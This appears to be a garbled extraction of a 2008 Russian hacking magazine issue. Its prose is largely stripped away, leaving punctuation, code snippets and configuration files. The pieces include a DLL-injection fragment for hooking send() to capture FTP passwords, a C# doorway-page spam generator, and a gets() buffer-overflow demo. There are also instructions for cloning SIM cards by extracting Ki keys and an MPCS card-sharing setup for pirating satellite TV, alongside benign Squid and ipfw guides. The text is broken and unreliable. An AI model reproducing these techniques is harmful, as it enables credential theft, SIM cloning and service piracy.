StrToInt(lvProcessList.Selected.Caption));
_dllPath := ExtractFilePath(ParamStr(0)) +
'test.dll';
InjectDll(_h, pchar(_dllPath));
108

, .
, send().
,
. , , .
OnClick() ,
, OnClick(). ,
. , handle
pid
InjectDll(), .
,
TotalCommander FTP .
totalcmd.exe
Total Commander FTP , ,
FTP.
, , , .
.

send().
, WinSock API
, , .
,
. ,
, . , , .
, www.vr-online.ru ,
API . ! z
x 05 /113/ 08
>> coding

/ baiborodin@gmail.com /
C#
SEO-.
, .

,
.

, . ,
(doorway) . -,
.
, , -
, , , .

,
. doorway. .
? :). , , , .
?
, .
,
. . ,
. -, . , ,
.
- .
, ,
110
. ,
, .
. ,
. ,
.
? ,
SERPa. ,
, . ,
, ,
. , , doorway,
, ?. ,
, , .
. ,
( JavaScript), , ,
.
. ,
, . .
Achtung! !
,
. ,
x 05 /113/ 08
>> coding
.
, , ,
. ,
. , , ,
. ,
.
.
, , , ,
JavaScript , ,
- .
.
, . ,
.
, .
, : , , - ( ). , .

. ( ).
?
,
.
, . .
, ,
.
, , ,
CD Ejectora :).
, . ,
.
, , ,
, .
, .
.
(
). ,
. HTML-.
( ,
, ,
, ). .
,
,
.
HTML-
. <title>, <head>
.
.
1. ,
, .
.
2. ,
, , .
, ,
.
?
, ?
, ,
, .
. , ,
.
. (
) . . ,

:
;
 ;
;
<title>, <description>, <keywords>;
;
;
, ;
;
;
;
;
:)

;
;
;
;
;
( ) ;
URL ;
, ;

;
, ;
;

.
, , . ,
, . ,
x 05 /113/ 08
111
>> coding
:

,
, , .
: ,
(
), .
. HTML-,
. , .
HTML- .
, .
. HTML-
(
). ,
,
. :
{TEXT}
{SCRIPT} JS
{MAIN_KEYWORD}
{RAN_KEYWORD}
. , www.klikforum.com,
.
,
, , .
: ,

.
, , , .
.
. .

.
checkedListBox.
. . , ,
, :
DialogResult result = fileChooser.ShowDialog();
String fileName;
if (result == DialogResult.Cancel)return;
fileName = fileChooser.FileName;
if (fileName == "" || fileName == null)
MessageBox.Show(" ", "Error",
MessageBoxButtons.OK, MessageBoxIcon.Error);
else {
input = new StreamReader(fileName);
makeKeyList();
}
112
,

makeKeyList().
private void makeKeyList() {
String a = null;
while (!input.EndOfStream) {
a = input.ReadLine();
if (a != null) checkedListBox1.Items.Add(a);
}
input.Close();
}
, ( EndOfStream) checkedListBox.
( ). ,
,
, :
private void checkedListBox1_ItemCheck(object sender,
ItemCheckEventArgs e){
String item =
checkedListBox1.SelectedItem.ToString();
if (e.NewValue == CheckState.Checked)addKey(item);
else remKey(item);
}
private void addKey(String val) {
if (keyList == null) keyList = new ArrayList(1);
keyList.Add(val);
}
private void remKey(String val) {
keyList.Remove(val);}
, , , keyList.
NewValue.
,
, addKey()
remKey().

.
. ,
, ,
.

.
x 05 /113/ 08
>> coding
lex[step] = (String)keyList[i];
step += step;
}
}
}
, , , .

. :
1. HTML-;
2. ;
3. ;
4. ;
4.1.
;
4.2. ;
4.3. ;
4.4. ,
;
4.5. HTML-.
,
, ,
. .

()
.
,
. ,
, . , ,
.
.
.
String[] lex = content.Split();
int lexCount = lex.Length;
int keyTotalAmount = (int)
(numericUpDown2.Value / 100 * lexCount);
if (keyTotalAmount != 0) {
int step = (int)(lexCount / keyTotalAmount);
for (int k = 0; k <= keyTotalAmount; k++) {
if (step <= lex.Length) {
! Split(),
.
,
.
(,

<h>, , ),
. , .
,
Replace(), :
template = templ.Replace
("#title", (String)keyList[i]);
template = template.Replace
("#header", header);
("#redirect", redir);
String newText = "";
for(int k = 0; k < lex.Length; k++)
newText = newText + " " + lex[k];
("#text", newText);
, . ,
- , , .
, (
).
warning
,

black list.

.
,
. ,
.
.
.
.
,
(, ..)
.
, , .
,
. z

. ,
.
.
,
6-8%.
x 05 /113/ 08
dvd

,

?

Visual Studio 2008.
.
: .
. ,
, . (
).
.
113
>> coding

ANSI C, , ,
. .NET (managed) .
01
.NET C#, F#, Visual Basic , , , . Microsoft Visual C++

- (
MSCIL Microsoft Common Intermediate Language
Microsoft, ,
-).
, ,
-. , ,
, ,
libc, . . , ++ ( ), , #09h .
-,
using namespace System; /CLR, :
hello.cpp ++,

#include <stdio.h>
// System ( .NET)
using namespace System;
void main() {

printf("hello, nezumi!\n");
}

:
02
, Microsoft : )
; ) ;
) ,
.
, .NET
/++
- .
.NET 2, -
, -
(x86, x86-64, IA64),
, .
C#
( ). ,
++ , .
:
,

#include <stdio.h>
#include <string.h>
void main() {

char buf0[0x6]; char buf1[0x6]; char buf2[0x6];

printf("enter str0 :");gets(buf0);

printf("enter str1 :");gets(buf1);

printf("enter str2 :")123;gets(buf2);

printf("your str is :%s,%s,%s\n",buf0,buf1,buf2);
}
$cl.exe /CLR hello.cpp

, hello.exe, hello,
nezumi! .
114

/CLR : .
06h ,
09h ( ).
x 05 /113/ 08
>> coding
:
$hello-over.exe
enter str0 :111111111
enter str1 :222222222
enter str2 :333333333
your str is :1111111122222222333333333,222222223333333
33,
333333333
, buf0 . buf1
; buf2 ,
( ). ,
, . , .
, , (
)
. - , ! ,
,
()
.
,

.
- !
.
03
, , , (, ),
. ,
C# , ++,
(native) ,
.
, .NET- P/Invoke,
,
#/C++
.
!
++ ,
. ,
Unicode:
nativecode.cpp ++ ,

#include "string.h"
#include "nativecode.h"
void native_foo(wchar_t* c, int num)
{
wchar_t* s = L"hello, this is native code!";
wcsncpy_s(c, num, s, wcslen(s));
}
(nativecode.h ) native_foo(), :
void native_foo(wchar_t* c, int num);
++ , native_foo(),
ref class CPPClass:
x 05 /113/ 08
clrcode.cpp ++ ,

native_foo()
#include "nativecode.h"
namespace souriz {
ref class CPPClass {
public:
static String^ foo_wrapper()
{
wchar_t c[0x69];
native_foo(c, sizeof(c) / sizeof(c[0]));
return gcnew String(c);
}
};
}
C# , foo_
wrapper() ++ .
native_foo()
CPPClass.foo_wrapper():
program.cs C#, foo_weapper()
++ ,
native_foo()
using System;
using souriz;
namespace nezumi
{
class Program
{
static void Main(string[] args)
{
String s = CPPClass.foo_wrapper();
Console.WriteLine(s);
}
}
}

:
make.bat ,
$cl.exe /c /MD nativecode.cpp
$cl.exe /clr /LN /MD clrcode.cpp nativecode.obj
$csc.exe /target:module /addmodule:clrcode.netmodule
Program.cs
$link.exe /LTCG /CLRIMAGETYPE:IJW /ENTRY:nezumi.
Program.Main /SUBSYSTEM:CONSOLE /ASSEMBLYMODULE:
clrcode.netmodule /OUT:mix.exe clrcode.obj nativecode.
obj program.netmodule
, mix.exe ,
, . , IDA Pro (
)
, , ,
.
, (
.NET , ).
,
( ) , . z
115
>> phreaking
(Di Halt)
/ di_halt@mail.ru /
SIM.
, .

, - ,
.
, .

SIM. , .
. , .

,
, . ,
, SIM-
, . , . , . SIM-
(
, ).
,
,
, - (
on/off SIM-). SIM-. , ,
. ,
Siemens SK65
. , ,
, .
116
Multi SIM. ,
Silver Card. SIM- (
).
,
. Silver Card
, . Green
Card, A-SIM .
, SMS.

, SIM-,
.
, , PIC,
, .
, , , ,
. SIM-
,
, SMS International
Mobile Subscriber Identity (IMSI) Key for identification (Ki) .
IMSI Ki SIM- ( ).
.
IMSI-.
.
SIM-,
Ki- . Ki,
IMSI,
. SIM- , , ,
Ki. ,
.
. , Ki-
, SIM-
. , ,
(
CPU ), -
.
SIM- IMSI, Ki .
? .
Ki- SIM-.
, SIM-
. , , , , , . x 05 /113/ 08
>> phreaking
.

.
:).
0.125 ( 0.5 ,
) :
2.2 1.
10 4.
15 1.
22 1.
1 1 .
:
33 2 .
100 2 .
:
470 25 2.
:
1N4148 3 .
:
. 3.5 .
3102 1 .
3.579545 1.
74HC04 1.

COM DB-9
.
MultiSIM .
Silver Card
,
.
.
, ,
,
,
.
PIC16
24Lxx.
.

, ,
. Silver Card
- Sim-Emu v6.1
.
Green Green 2
Silver .
x 05 /113/ 08

. Silver 64 , Green 128,
Green 2 256.

SMS.
Green
,
Green 2.
.. Gold
Card
, , -,

(16 ),
-,
.

,
. ,

SimEmu v6.1,

.

Silver/Green SIMMAX.

,

,
reader,
.
, ,

-SIM.
,

.
,
Silver Card, ,
2in1.

.

/

(, 1111

; 2222

).
,

.
, - Silver Card

.
:
.
, ,
, ( SIM , ).

, Silver
Card. , -SIM
,
.
117
>> phreaking
Sim Reader .
3110
have .
.
Multisim menu
, 100%, (
), . , 65536
, Ki , , .
, ,
: COMP128v1 COMP128v2.
, . ,
128v2, Silver Card
, .
?
, , .
, , .
?
,
; ;
GPRS, .
, - ,
, , iPhone -
, PCMCIA GSM Modem, T-mobile , , MultiSIM must
118
, .
, , , . , -
, .
. -, SIM-
, ,
. MultiSIM ,
SIM- , . ,

.
,
SIM- IMSI-Ki.
? ? ?
, . ?
MultiSim . , (, Silver Card Multisim).
- , .
, . , . , , ,
. , SimEmu ,
.
. , Multisim
Card 250-500 , .
, . SIM,
MultiSIM. , ,

. SIM- .
,
!
. SIM-
.
SimScan, ,
x 05 /113/ 08
>> phreaking
Silver Card! ,
Woron Scan, Ki . -
.
, Silver Card.
Reader

SIM-, .
.
.
. , , ,
. - .
,

,
. ,
, reader
.

. 6 4
, .
50 .
. ,
. , . ,
.
( -120) .
, . . .
SIM-.
, .
.
, Nokia 3110
.

, ( ). ,
, .
.
Lets go shake, shake!

, //. Ki . -,
SIM- Woron Scan. Card Reader
Phoenix Card. Card Reader Settings
9600 , .
Sim Reader
x 05 /113/ 08
119
>> phreaking
SimScan
SIM-
Ki
Woron Scan
RST . ,
- :
The real speed is 9600..
There is a card in Phoenix device:
ATR:
3B 9B 95 80 1F 43 80 31 30 73 32 21 00 53 25 99
01 DD
, , , .
, . IMSI
IMSI-.
Ki-. Ki START
PIN- ( SIM-)
. , .
Ki .
,
. 60000 , . .
60000 , .
, .
, . .
, - ,
SimScan. ,
. ,
Find Ki.
, , MultiSIM .
SIM- (, Siemens ). Sim-Emu 6.01s (
A-sim -, Silver ,
-).
. :
Sel.Phone .
, .
Configure , .
Information ,
.
Reset . , :).
Configure. :
Edit # ,
. - Beeline
120
Woron Scan
. ,
.
, Beeline
.
Config.Pos .
, PIN2 ( 1234).
, .
. , 0.
IMSI. 16
. Ki ! , , . .
PUK . ,
. , PIN .
. PIN,
0,
, , ,
PIN-. , ?
Config.SMS SMS.
.
Config.ADN .
, 1.
PIN2/PUK2 , PIN2
PUK2 .
Erase.Pos SIM-. ( ) OK.
Outro
, , MultiSIM .
. - ,
di-halt.livejournal.com. , .
, ! z
x 05 /113/ 08
>> phreaking
Genocide
/ genocide@xakep.ru /

.
,
. ,
.
.
, .

.

, .
C ?
][ ,
, . ,
,
. , ,
. ,
,
.
,
. , ,
,
.
122

, , ? : . .

. : OpenBox
Dream Box, .
, Power PC,
Linux , ,
. Dream Box
, - . , .
. ,
, OpenBox 300 .
, .
OpenBox, RS232 , ,
, -.
.

?
. ,
, .
. Rx Tx. .
.
.
. . , :
1
2
3
5
1
3
2
5
.
- ,
. ,

. .
.
MPCS !
, ,
MPCS. ,
x 05 /113/ 08
>> phreaking
,
. - , , ( ).
.
.
, mpcs.conf:
[global]
Nice
= -1
#LogFile
= log
#LogFile
= /dev/tty
ClientTimeout = 5
LogFile
= stdout
[serial]
Device
= tuner@/dev/ttyS0?delay=1&timeout=300
Device = tuner@/dev/ttyS0?delay=1&timeout=300
, COM1
ttyS0. 2 Device = tuner@/dev/ttyS1?delay=1
&timeout=300 ..
. , , -
, .
mpcs.server.
.
[reader]
Label
= newcamd
Protocol
= newcamd
Key
= 0102030405060708091011121314
Device
= kardsharing-super-server.ru,10000
Account
= Genocide_login,my_k00l_password
Fallback
=0
Group
=1
ReconnectTimeout = 20
Label ,
.
Protocol ,
. newcamd, , , camd35 cs357x-.
. , , .
Key . 010203040506070809
1011121314.
Device , ; ( IP)
. .
Account , : , , :).
.
.
BusyBox
? - , UNIX , .
. BusyBox , . BusyBox
.
, .
x 05 /113/ 08

OpenBox. !
menu 1 1 1 7, . . No. CA SYS 0500, Index Provider
02 07 10. ;
, , , .
, MPCS .
:
2008/04/06 20:06:50 1420 s >> STREAMBOARD << mpcardserver started
2008/04/06 20:06:50 1420 s newcamd: disabled
2008/04/06 20:06:50 1420 s radegast: disabled
2008/04/06 20:06:50 1420 s logger started (pid=1564)
2008/04/06 20:06:50 1420 s resolver started
(pid=1580, delay=30 sec)
2008/04/06 20:06:50 1420 s proxy started (pid=1600,
server=******.*****
2008/04/06 20:06:50 1420 s anti cascading: disabled
2008/04/06 20:06:50 1420 s serial: initialized
(pid=1616, auto@/dev/ttyS0
2008/04/06 20:06:50 1600 p02 proxy ******.*****:10000
newcamd525
2008/04/06 20:08:09 1616 c01 detected dsr9500extended
type receiver
2008/04/06 20:08:09 1616 c01 plain dsr9500client
127.0.0.1 granted
2008/04/06 20:08:10 1600 p02 server ******.*****:10000
caid: 0500
2008/04/06 20:08:17 1616 c01 tuner (0500&020710/5015/4
A:97FA): found (774 ms)
2008/04/06 20:08:27 1616 c01 tuner (0500&020710/5015/4
A:97FB): found (895 ms)
2008/04/06 20:08:37 1616 c01 tuner (0500&020710/5015/4
2008/04/06 20:08:47 1616 c01 tuner (0500&020710/5015/4
A:97FB): found (828 ms)
2008/04/06 20:08:57 1616 c01 tuner (0500&020710/5015/4
.
, .
,
. ,
, , .
!
.
. . ,
LanCom Box. ,
- Ethernet.
( ,

DLINK-500T LAN- , ,
ADSL- , MPCS !
, LAN-. VPN- ,
.
123
>> phreaking
OpenBox-300.
DreamBox ,
OpenBox
, - VPN).
ADSL-. , ADSL , (
),

Linux- . .
, ADSL- DLINK-500T
, uLinux MPCS. ,
DLINK-500T RS232.
, - , .
. ,
.

, ,
Dlink-500 ( ,
Intel).
, Samsung. RS232. ? !
! ?
JP2. ,
UART, RS232
MAX3232. - Sprint
Layout . ,
, ,
. , , RS232,
MAX3232 .
, ,
Rx Tx MAX3232, ,
. ,
, :
1
2
3
4
5
Rx
Vcc
GND
Tx
124
mpcs.conf
[global]
Nice = -20
LogFile = /dev/null
ClientTimeout = 5
[monitor]
Port = 988
NoCrypt = 192.168.0.0-192.168.255.255
AULow = 120
MonLevel = 4
[newcamd]
Key = 0102030405060708091011121314
Port = 50000@0500:020710
[cs378x]
Port = 50002
[camd35]
Port = 50001
#[serial]
#Device = tuner@/dev/ttyS0?delay=1&timeout=300
x 05 /113/ 08
>> phreaking
links
. TTL-RS232 .
MAX232 .

.

, ! Mcmcc.
http://mcmcc.bat.ru (
).
. ,
IP-. ( Login Admin, password
Admin). Tools Update Gateway.
Update
Gateway. ,
Status Information ,
.

MPCS. Telnet,
telnet 192.168.1.1.
.
, , root Admin.
BussyBox:
BusyBox on router login: root
Password:
********************************************
-.
*
ADSL LAN ROUTER D-Link DSL-500T (McMCC)
********************************************
BusyBox v0.61.pre (2007.01.15-21:12+0000)
Built-in shell (ash)
Enter help for a list of built-in commands.
#
cat /proc/ticfg/
env, ,
:
mtd0
mtd1
mtd2
mtd3
mtd4
satcode.biz

,
.

MPCS.
viaccessforfree.info

.
southern-bear.pisem.
net/sattv/doc
.
0x90083000,0x903f0000
0x90010090,0x90083000
0x90000000,0x90010000
0x903f0000,0x90400000
0x90010000,0x903f0000
:
echo "mtd5 0x901F0000,0x90200000" > /proc/
ticfg/env
echo "mtd4 0x90020000,0x901F0000" > /proc/
ticfg/env
echo "mtd0 0x90097000,0x901F0000" > /proc/
ticfg/env
dvd
MPCS
, ,
.
( reboot)
( cat /proc/ticfg/env), .
mpcs.user
mpcs.server
[account]
User = tuner
Pwd = tuner
Group = 1
[reader]
Label = newcamd
Protocol = newcamd
Key = 0102030405060708091011121314
Device = *******,***** //
-
Account = *******,***** //
.
CAID = 0500
IDENT = 0500:020710
Fallback = 0
Group = 1
ReconnectTimeout = 20
[account]
User = monitor
Pwd = monitor
Group = 1
x 05 /113/ 08
125
>> phreaking
ADSL- Dlink500T.
-
-.

FTP- tFTPd32.exe.
:\ :\LAN , MPCS FTP-.
:
mpcs.mem
mpcs.guess
mpcs.ac
mpcs.srvid
mpcs.conf
mpcs.server
mpcs.user
mtd5.tar
tftpd32.exe
MPCS (192.168.0.2).
, RS232 RS232
. Line ADSL, LAN
. ADSL ,
. !
?
!
ADSL ( , ), GPRS.
. ,
.
newcamd
. , .
Java , .
,
.

MPCS .
tftpd32.exe telnet .
:
cd /var/tmp
tftp -g -l mtd5.tar 192.168.1.2
tar -xf mtd5.tar
cd mycfg
tftp -g -l mpcs.conf 192.168.1.2
tftp -g -l mpcs.server 192.168.1.2
tftp -g -l mpcs.user 192.168.1.2
cd ..
tar -cpf m.tar mycfg
gzip m.tar
cfgsave m.tar.gz
reboot
126
,
. , ,
. ,

( ) ? ,
. DVD,
, , , , .
. . ,
. ,
.
, . , ,
- ,
. z
x 05 /113/ 08
>> .pro
GrindEr
/ grinder@ua.fm /

Longhorn
WINDOWS SErVEr 2008:
Microsoft .
Windows Server 2008 Longhorn . - . , .

(Beta
1 2005 ), Win2k3, . ,
18
Vista SP1, . , , , Vista ( ,

, NAP),
x 05 /113/ 08
>> .PRO

.
Win2k3 . ,
(ntoskrnl.exe) .
, .
, 64
-, NT.
. .
Vista 2k8 SMB 2.0 ,
.
.
DCPROMO . ,
, .

. ,
Export Setting.
,
. , DCPROMO
. .
(ReadOnly Domain Controller RODC). DC ,
, ,
. RODC Active
Directory .

(Network Policy and Access Service), IAS
(Internet Authentication Server). , , RADIUS .
(Network Access Protection NAP). , , ,
.
NAP, ,
System Health Validators (SHV),
(NPS).
, . (Connection Request Policies).

: ,
x 05 /113/ 08
, ,
. .
, NAP *nix
Windows XP . ,
. NPS ,
.
IIS 7.0, .
40 , 8
( ,
). , FTP-
.
Win2k8
, , . Standard,
Enterprise, Datacenter Web ( 32 64 )
Itanium Windows Server 2008 for
Itanium-Based Systems. , ,
32 . , Hyper-V.
without Hyper-V, .
, . Hyper-V
, .
.
: 1 (x86) 1.4
(x64), 512 10 .
, .
. 60
, 948472,
, 240 .
, .
,
60 , , slmgr.vbs -dli.
,
.
,
Windows.
,
129
>> .pro
network connections
. 2k3 . , New
. Format .

(, ): Full Core Installation.

,
. .
. ,
, .
Create a password reset disk. , ( !)
.
Win2k3 .
, Aero Vista.
Windows , . ,
.
, , Security Configuration Wizard
( ). , , secedit.
,
.
(Role Services). , Network
Policy and Access Service 6 Role Services,
. ,
, , Role Services
Server Manager. :
.
Network Connections,
, , IPv4,
IPv6. Microsoft .
, Alternate
Configuration. ,
. Link-Layer Topology Discovery Mapper
,
Responder .
Task Scheduler, .
.

.
Initial Configuration Tasks, Win2k3. ,
.
Initial Configuration Tasks ,
.
, , Windows
Firewall, , (Features).
, .
16 (),
(AD, AD, Network Policy Server, ). , , .
, , . ,
BitLocker, (Network
Load Balancing), PowerShell, Telnet, SMTP, SNMP,
,
. ( )
.
130
seRVeR MaNageR
. , Add Hardware,
, P-n-P. Network and Sharing Center , , , .
Administrative Tools .
(Server Manager), Computer
Management Win2k3.
. , Administrative Tools, Server Manager.
,
.
,
, -
x 05 /113/ 08
>> .pro
info

ServerManagercmd.
exe, ,

.
network Policy Server
. ,
. Server Manager
: (
), ,
, .
,
.

.
,
, .

. ,
. ,
, , . ,
,
, .
, , ,
( Administrative Tools).
, , WMI,
, , . Storage ,
: Windows Server Backup Disk Management.
(Shadow Copy, )
.

,
Win2k8. .
,
. , .
Windows Firewall Server
Manager Administrative
Tools. Initial
Configuration Task. (Domain), (Private)
(Public). ,
x 05 /113/ 08
, , ,
, , .
IPSec.
,
.
.

. Event Viewer,
, .
.
,
Server Manager. Win2k8
Microsoft
Operations Manager. Summary
,
. , , .
, Event Viewer,
, .
XML-
. Subscriptions.
Windows Event Collector Service, , ,
. , .
, ,
, Event Viewer .
, ,
.
Attach Task To This Event,
Create Basic Task Wizard,
: e-mail,
.

, Win2k8
,
, , ,
. ,
, . z
,
60- , ,
slmgr.vbs dli.
slmgr.
vbs rearm
,
,
60 ,
.

!
(
),

.
links

Longhorn
:
www.microsoft.com/
windowsserver2008.
948472
21 ,
,
,

240 .
Beta 3
][ www.
xakep.ru/post/41325.
131
>> .pro
GrindEr
/ GRiNDER@UA.fM, TUx.iN.UA /
SQuID:
Web- ,
- Squid.
, . , Squid .
sQUiD
Squid. Squid, (www.
squid-cache.org) , / HTTP, FTP . TLS/SSL ,
DNS, Squid
. GNU GPL.
Unix GNU/Linux, *BSD, Mac OS X,
SunOS/Solaris. Windows.
Ubuntu,
( -
13
). ,
: 2.x 3.x. STABLE
, . Ubuntu 6.06 LTS Dapper Drake
Squid 2.5, 7.10 2.6.14.
Ubuntu, Festy Fawn (7.04),
Squid. .
Ubuntu :
$ sudo apt-get install squid squid-common
x 05 /113/ 08
>> .PRO
Ubuntu Squid
, Squid 3:
$ sudo apt-get install squid3 squid3common
squid.conf
Squid
. FATAL:
Could not determine fully qualified hostname.
Please set 'visible_hostname'. ,
, Squid,
gethostname(). DNS
,
Generated by server.com
(squid/3.0.STABLE2), .
Squid /etc/
squid/squid.conf. .
,
, :
$ sudo grep -v "^#" /etc/squid/squid.conf | sed
-e '/^$/d'
squid.conf Unix.
: . , , .
.

.
include. ,
.
Squid, ,
. Squid ( ):
visible_hostname mysquid
:
$ sudo /etc/init.d/squid start

3128/tcp. netstat ant |
grep 3128 , .
OK, -
- . localhost.
, ,
.
x 05 /113/ 08

http_port, Squid
:
http_port 192.168.0.1:3128
192.168.0.0,
172.16.0.0 192.168.1.1
Squid,
ACCESS CONTROL:
acl localnet src 192.168.0.0/24 172.16.0.0/12
192.168.1.1
, ,
acl -i, .
, . ,
, (
),
. .
src ( source). (dst), - (arp),
(srcdomain, dstdomain), (port),
(proto), (time) . ,
acl,

http_access . ,
, :
acl work_hours time M T W T F 9:00-18:00
,
. ACCESS CONTROL
ACL, ,
( ) ACL,
:
acl SSL_ports port 443 563 873
acl Safe_ports port 80 21 443 563 1025-65535
acl all src 0.0.0.0/0.0.0.0

.
info
Squid

( ,
),

.
Ubuntu sudo
apt-cache search
squid.

Squid
/usr/share/doc/
squid
.

- bfilter
(bfilter.sf.net)
squid
adzapper (adzapper.
sf.net).

Squid 2.6

,

httpd_
accel_* http_port
127.0.0.1:3128
transparent.
133
>> .pro
Squid
, http_access ACL.
:
Squid Webmin
, :
http_access allow work_hours workip
http_access deny workip
http_access allow|deny [!]_ACL

, ,
. :
http_access deny all
.
, , . , , ,
.
Squid , :
http_access allow localnet
http_access deny !Safe_ports
http_access deny !SSL_ports
Squid:
ACL:
IP-. ACL workip ( ).

, Squid , .
: acl http_access. ,
:
acl denynet dst 194.55.0.0/16
http_access deny denynet
, , dstdomain
. ,
RapidShare:
acl rapida dstdomain .rapidshare.com .rapidshare.de
http_access deny rapida
$ sudo /etc/init.d/squid restart

. , .
, iptables:
iptables -t nat -A PREROUTING -i eth1 \
-p tcp -m tcp --dport 80 -j DNAT \
--to-destination 192.168.0.1:3128
iptables -t nat -A PREROUTING -i eth0 -p tcp -m tcp \
--dport 80 -j REDIRECT --to-ports 3128
. ,
IP . :
acl workip src 192.168.1.100 192.168.1.200192.168.1.210
http_access deny !work_hours workip
134
, ( ,
- ),
:
http_access deny workip dstdomain
, . ,
, , , . ACL
:
acl adult dstdom_regex sex
acl regexdomain dstdom_regex \.com$ \.net$ \.tv$
http_access deny adult regexdomain
,
sex, .com, .net .tv.
x 05 /113/ 08
>> .PRO
Webmin
,
dstdom_regex url_regex urlpath_regex.
URL.
, URL ( ). , ,
.
urlpath_regex ,
. , -i:
acl videofiles url_regex i *\.avi$ *\.mpg$ *\.mp4$
*\.swf$
acl soundfiles urlpath_regex -i \.mp3$ \.asf$ \.wma$
http_access deny videofiles soundfiles
, URL :
acl blockfiles urlpath_regex -i "/etc/squid/blocks.
files.acl"
http_access deny blockfiles
:
$ sudo nano /etc/squid/blocks.files.acl
\.exe$
\.avi$
\.mpg$
\.mpeg$
\.mp3$
Squid.
, , URL . deny_info,
ERROR PAGE OPTIONS.
URL, , ACL,
deny_info.
/etc/squid/errors HTML. ,
error_directory ( Ubuntu
/usr/share/squid/errors/English). squid.conf:
deny_info ERR_BLOCKED_FILES blockfiles
/etc/squid/errors/ERR_BLOCKED_FILES,
.
. , Google AdSense
:
x 05 /113/ 08
Webmin
acl adsense url_regex i *pagead2*

http_access deny adsense
proto, (http ftp),
,
:
acl ftp proto ftp
http_access deny ftp workip
, workip,
FTP-. ACL
. ,
squidGuard (
).

.
. Ubuntu /var/spool/squid. . ,
cache_dir. :
cache_dir type L1 L2 [options]
:
cache_dir ufs /var/spool/squid 10249 16 256
type : ufs (unix file system), aufs diskd.
ufs .
, ,
100 . ,
( 10 ).
, cache_dir,
, .
Squid ,
,
.
L1 L2. 16 256, . cache_
dir read-only ( ) max-size
( ).

maximum_object_size. 4 ,
:
135
>> .PRO
maximum_object_size 10240 KB

links
wiki.
squid-cache.
org/ConfigExamples

Squid.
warning

Squid.
136
control: public, .
, :
ignore-no-store Cachecontrol: no-store;
refresh-ims If-Modified-Since.

, :
, minimum_object_size,
,
( 0). , Squid
, cache_mem ( 8 ).
, . Squid
, .
refresh_pattern .
518400 80% 518400
. ,
reload_into_ims override-expire override-lastmod reload-into nocache reload .
ims ignore-no-cache ignore-private ignore HTTP,
auth ignore-no-store
,
:
Squid.
. reload_into_ims on
,
.
. ,
.
, reload_into_ims
, server.com/current.
refresh_pattern,
exe. :
:
refresh_pattern \.exe$ 43200 100%
43200
refresh_pattern [-i] regex min percent max
override-expire override-lastmod reload-into[options]
ims ignore-no-cache ignore-private ignoreauth ignore-no-store
regex ,
refresh_pattern \.zip$ 43200 100%
43200
.
.
override-expire override-lastmod reload-into. . min
ims ignore-no-cache ignore-private ignoremax
auth ignore-no-store
, .
percent . .
. min 0,
acl/

http_access ,
. Squid 2.x , :
:
refresh_pattern http://ad\.
43200
refresh_pattern ^ftp: 1440
20%
10080
100% 43200 override-expire override-lastmod
refresh_pattern ^gopher:1440 0%
1440
reload-into-ims ignore-no-cache ignorerefresh_pattern .
0
20%
4320
private ignore-auth ignore-no-store
refresh_pattern http://click\. 43200
3.0 . :
reload-into-ims ignore-no-cache ignorerefresh_pattern (cgi-bin|\?) 0
0% 0
refresh_pattern http://count\. 43200
options
. 2.x , 3.
reload-into-ims ignore-no-cache ignore .
HTTP, .
.
: URL,
.
override-expire
expire,
- bfilter (bfilter.
;
sf.net) squid adzapper (adzapper.
sf.net).
override-lastmod , ;
, .
reload-into-ims, ignore-reload - , Webmin,
nocache reload
, ;
. 10.

ignore-no-cache, ignore-private, ignore-auth Pragma: no-cache, Cache-control:
,
no-cache, Cache-control: private Cache. z
x 05 /113/ 08
>> .pro

/ amsand@rambler.ru /
- frEEBSD
, . ,
, .
, ,
.
,
. , Apache, - (
) rl0,
138
, rl0 . , ,
, , BGP,
. , , ,
x 05 /113/ 08
>> .pro
log ipfw, /var/log/security
, , , ?
, ,
, ,
, .
FreeBSD ipfw. , ,
.
.
172.16.0.0/16, . . (
255.255.0.0).
, - , (aka ).
:
IP- 100.100.100.102 ( 100.100.100.101), ADSL-
192.168.1.1 ( PPPoE, IP NAT-
; , , 192.168.1.1
).
, (,
-), .

. -,
, . -, (
x 05 /113/ 08
), (
: 1-,
2-). -, , ,
SMTP , ,
.
( , , ):
1. ,
213.100.0.0/16 213.200.0.0/24, 2- ,
1-.
2. 2- 172.16.0.x, 1- 172.16.1.x
172.16.2.x.
3. SMTP- 1- ( , Sendmail ),
2- .
4. HTTP- 172.16.1.x
2- , 1-; HTTP .
5. TCP-
, 2:1,
.
139
>> .pro
nAT
. , ,
, , , . -
,
,
.
, NAT, , . ? :
( , ) , .
, ,
, .
, .
1:

.
( , ),
213.100.0.0/16 213.200.0.0/24
:
# route add default 100.100.100.101
# route add 213.100.0.0/16 192.168.1.1
# route add 213.200.0.0/24 192.168.1.1
, /etc/
rc.conf :
$ grep route /etc/rc.conf
static_routes="prov1_100 prov1_200"
route_prov1_100="213.100.0.0/16 192.168.1.1"
route_prov1_200="213.200.0.0/24 192.168.1.1"
defaultrouter="100.100.100.101"
,
, . ,
:
140
ipfw show , ,
# route add 0.0.0.0/1 192.168.1.1

, , ,
, ,
.
NAT-.
, , ,
,
,
( , ).
, :
# natd -a 100.100.100.102 -p 8668
# natd -a 192.168.1.2 -p 8669
# ipfw add divert 8668 ip from 172.16.0.0/16 to any via
rl0 out
# ipfw add divert 8669 ip from 172.16.0.0/16 to any via
ed0 out
# ipfw add divert 8668 ip from any to 100.100.100.102 via
rl0 in
# ipfw add divert 8669 ip from any to 192.168.1.2 via ed0
in
? , ,
, ,
( ).
natd,
IP- .
.
FreeBSD 7.0
natd:
#
#
#
#
ipfw
ipfw
ipfw
ipfw
nat
nat
add
add
1 config ip 100.100.100.102
2 config if 192.168.1.1
nat 1 from 172.16.0.0/16 to any via rl0
nat 2 from 172.16.0.0/16 to any via ed0
x 05 /113/ 08
>> .PRO
info
, tcpdump
# ipfw add nat 1 from any to 100.100.100.102 via

rl0
# ipfw add nat 2 from any to 192.168.1.1 via ed0
, . ,
, , .
2:
, ,
.
,
. , (
NAT-)
, .
forward-
. ,
, :
# ipfw add 1000 divert 8669 ip from
172.16.0.0/16 to 213.100.0.0/16
172.16.0.0/16 to 213.200.0.0/24
172.16.0.0/16 to any
# ipfw add 1200 divert 8669 ip from any to
192.168.1.2
100.100.100.102
# ipfw add 1500 fwd 192.168.1.1 ip from
192.168.1.2 to any
, , ,
NAT. ,
192.168.1.2 ,
, .
,
from, to, ,
( , ):
# ipfw
to any
# ipfw
80
# ipfw
# ipfw
uid 0
add 10000 divert 8669 all from 172.16/16

add 10010 divert 8669 all from any to any
add 10020 divert 8669 udp from any to any
add 10030 divert 8669 all from any to any
x 05 /113/ 08
, ( )
,
.
NAT , ,
, .
,
.
?
- -
IP- ? , .
,
,
